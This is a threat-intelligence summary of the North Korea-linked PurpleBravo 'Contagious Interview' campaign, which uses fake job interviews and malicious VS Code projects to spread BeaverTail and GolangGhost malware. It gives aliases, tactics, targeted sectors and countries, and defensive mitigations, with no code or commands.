Full Report
As many as 3,136 individual IP addresses linked to likely targets of the Contagious Interview activity have been identified, with the campaign claiming 20 potential victim organizations spanning artificial intelligence (AI), cryptocurrency, financial services, IT services, marketing, and software development sectors in Europe, South Asia, the Middle East, and Central America. The new findings
Analysis Summary
# Threat Actor: PurpleBravo (Contagious Interview Activity)
## Attribution & Identity
**Attribution:** North Korean threat activity cluster.
**Known Aliases and Associated Groups:** CL-STA-0240, DeceptiveDevelopment, DEV#POPPER, Famous Chollima, Gwisin Gang, Tenacious Pungsan, UNC5342, Void Dokkaebi, WaterPlum. Associated with the Wagemole (aka PurpleDelta) campaign cluster due to tactical and infrastructure overlaps.
## Activity Summary
PurpleBravo is responsible for the "Contagious Interview" activity, first documented in late 2023. This campaign leverages fake job interview lures, specifically targeting software developers and IT candidates, often using malicious Microsoft Visual Studio Code (VS Code) projects provided during coding assessments. In several instances, candidates executed malicious code on corporate devices while performing assessments, exposing their employers. The identified activity spanned from August 2024 to September 2025.
## Tactics, Techniques & Procedures
- **Social Engineering:** Use of fictitious job offers and phony recruitment processes (LinkedIn personas posing as developers/recruiters) to gain initial access.
- **Supply Chain Compromise (Developer Workflow):** Abusing trusted developer workflows by using malicious VS Code projects to distribute backdoors.
- **Initial Access:** Candidates executing malicious code on corporate devices during technical assessments.
- **Malware Deployment:** Distribution of malware families like BeaverTail (a JavaScript infostealer/loader) and GolangGhost (a Go-based backdoor).
- **Infrastructure Management:** Administration of C2 communications via Astrill VPN and from IP ranges located in China.
## Targeting
- **Sectors:** Artificial Intelligence (AI), Cryptocurrency, Financial Services, IT Services, Marketing, and Software Development.
- **Geography:** Victims identified across Europe, South Asia, the Middle East, and Central America. Specific victim countries include Belgium, Bulgaria, Costa Rica, India, Italy, the Netherlands, Pakistan, Romania, the U.A.E., and Vietnam.
- **Victims:** Identified 3,136 individual IP addresses linked to likely targets, with 20 potential victim organizations identified.
## Tools & Infrastructure
- **Malware Families:** BeaverTail (JavaScript infostealer/loader), GolangGhost (Go-based backdoor, based on HackBrowserData open-source tool).
- **Infrastructure (C2, domains, IPs):** C2 servers hosted across 17 different providers. C2 administration observed originating via Astrill VPN and from IP ranges in China.
## Implications
PurpleBravo demonstrates a sophisticated, targeted approach focused on exploiting the IT software supply chain by infiltrating organizations via the hiring and vetting process for technical staff. The success of this method allows the actor to gain access to sensitive corporate networks through trusted candidates executing assessments, achieving twin goals of cyber espionage and financial theft.
## Mitigations
- **Vetting Security:** Implement strict security protocols for all technical assessments, especially those requiring candidates to run code or use sandboxed/corporate development environments. Assess security hygiene of development environments used by external testers/candidates.
- **Endpoint & Network Monitoring:** Enhanced coverage for detecting the lateral presence and execution of known malware families like BeaverTail and GolangGhost.
- **VPN Monitoring:** Investigate and monitor source IP ranges associated with C2 infrastructure, noting the actor's observed use of Astrill VPN for command/control obfuscation.
- **Supply Chain Integrity:** Focus security efforts on the software supply chain, recognizing that trusted developer workflows are a primary infiltration vector.